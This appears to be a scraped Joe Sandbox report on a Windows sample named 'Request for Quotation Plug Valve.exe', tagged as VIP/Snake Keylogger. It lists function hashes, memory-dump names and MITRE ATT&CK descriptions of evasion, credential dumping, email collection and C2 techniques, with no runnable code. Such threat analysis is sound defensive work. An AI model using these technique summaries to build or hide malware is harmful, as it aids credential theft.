Opcode Fuzzy Hash: ebae6991f1ec191c2a26c59b0614c4faa11e7031136243b81c1a121bf7c5b71d
Instruction Fuzzy Hash: FB41C474E016488BEB58DFAAD9547ADBBF2BF89300F24D129C415BB258DB345946CF40

Function 068ED540 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1812606ca2479b886d0242a7a961d93a2fce4564cf78592397e6715fc6a68a30
Instruction ID: 78b898ec6acb8eb8454bab0d393d4aa0a436465f544f72e37f3f52e75f75f57b
Opcode Fuzzy Hash: 1812606ca2479b886d0242a7a961d93a2fce4564cf78592397e6715fc6a68a30
Instruction Fuzzy Hash: 5841D5B4D012488BEB58DFAAD95069DBBF2BF8A300F24C12AC419BB259DB355946CF40

Function 068EE6AA Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f2cd1d06a9b59230fa3dfbc5d2ddc2a50cb924aab4487c0d61e23451245e62
Instruction ID: ed007953121e9786265f7716f76bdcf0c5d24885d7c66a2e35b1861dca72075c
Opcode Fuzzy Hash: 77f2cd1d06a9b59230fa3dfbc5d2ddc2a50cb924aab4487c0d61e23451245e62
Instruction Fuzzy Hash: 5941D474E012488BEB58DFAAD9447ADFBF2BF89300F24D12AC415BB258DB355945CF50

Function 068EFC5E Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e83279c80ab2860fa21340519ab9426f15914c80b47ddfa110a4f1dfc1b0a1
Instruction ID: 9c2456452ec87723dddc99629552ec2549fbbd7b3a6b964ba04af3951c693743
Opcode Fuzzy Hash: 43e83279c80ab2860fa21340519ab9426f15914c80b47ddfa110a4f1dfc1b0a1
Instruction Fuzzy Hash: 0E31C674E012588FDB58DFAAD8406EEBBB2BF8A300F14D12AD415BB254DB745946CF50

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Request for Quotation Plug Valve.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation Plug Valve.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Request for Quotation Plug Valve.exe

Function 00E844E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 00E85903 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Function 00E8D8E0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 00E8BF40 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 07653C62 Relevance: 1.3, APIs: 1, Instructions: 65
COMMON

Function 07653C84 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Function 07654730 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Function 068E9548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Function 068E0B30 Relevance: .7, Instructions: 709
COMMON

Function 02AB69A0 Relevance: .5, Instructions: 510
COMMON

Function 02AB7118 Relevance: .3, Instructions: 348
COMMON

Function 068E2968 Relevance: .3, Instructions: 268
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre